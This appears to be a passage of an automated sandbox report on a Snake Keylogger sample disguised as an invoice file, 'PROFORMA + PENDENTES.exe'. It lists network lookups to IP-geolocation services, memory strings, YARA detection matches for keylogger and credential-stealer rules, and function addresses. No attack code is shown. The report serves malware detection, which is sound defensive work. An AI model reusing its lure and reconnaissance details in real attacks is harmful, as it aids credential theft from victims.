              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
              Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D4D000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgH
              Source: WYqxTmjfOgdZ.exe, 00000010.00000002.1694863278.0000000006560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mv
              Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E52000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1483837011.0000000002791000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 0000000C.00000002.1547422246.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187
              Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187$
              Source: PROFORMA + PENDENTES.exe, WYqxTmjfOgdZ.exe.0.drString found in binary or memory: https://www.google.com/#q=
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443

              System Summary

              barindex
              Source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_06E46CE80_2_06E46CE8
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_06E416E70_2_06E416E7
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_06E416F80_2_06E416F8
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_06E4B4E00_2_06E4B4E0
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_06E4C2C80_2_06E4C2C8
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_06E4A2400_2_06E4A240
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_06E4A2320_2_06E4A232
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_06E430320_2_06E43032
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_06E49E080_2_06E49E08
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_06E49DDA0_2_06E49DDA
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_06E4BDA80_2_06E4BDA8
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_06E4BDB80_2_06E4BDB8
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_07081F280_2_07081F28
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_070800400_2_07080040
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_070800070_2_07080007
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 11_2_00FFC19011_2_00FFC190
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 11_2_00FF610811_2_00FF6108
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 11_2_00FFB32811_2_00FFB328
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 11_2_00FFC47011_2_00FFC470
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 11_2_00FF97E811_2_00FF97E8
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 11_2_00FFC75111_2_00FFC751
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 11_2_00FF673011_2_00FF6730
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 11_2_00FF4AD911_2_00FF4AD9
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 11_2_00FFCA3111_2_00FFCA31
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 11_2_00FFBBD311_2_00FFBBD3
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 11_2_00FFBEB011_2_00FFBEB0
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 11_2_00FFB4F311_2_00FFB4F3
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 11_2_00FF357011_2_00FF3570
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 12_2_05CFDE9812_2_05CFDE98
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 12_2_05CFA40812_2_05CFA408
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 12_2_05F4E55112_2_05F4E551
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 12_2_05F46CE812_2_05F46CE8
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 12_2_05F4B4E012_2_05F4B4E0
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 12_2_05F416F812_2_05F416F8
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 12_2_05F416E712_2_05F416E7
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 12_2_05F4303112_2_05F43031
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 12_2_05F4C2C812_2_05F4C2C8
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 12_2_05F4A24012_2_05F4A240
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 12_2_05F4BDB812_2_05F4BDB8
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 12_2_05F4BDA812_2_05F4BDA8
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 12_2_05F49E0812_2_05F49E08
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 12_2_0A65044812_2_0A650448
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 16_2_013A610816_2_013A6108
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 16_2_013AC19016_2_013AC190
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 16_2_013AB32816_2_013AB328
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 16_2_013AC47016_2_013AC470
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 16_2_013AC75316_2_013AC753
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 16_2_013A985816_2_013A9858
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 16_2_013A688016_2_013A6880
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 16_2_013ABBD316_2_013ABBD3
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 16_2_013ACA3316_2_013ACA33
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 16_2_013A4AD916_2_013A4AD9
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 16_2_013ABEB016_2_013ABEB0
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 16_2_013A357316_2_013A3573
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 16_2_013AB4F316_2_013AB4F3
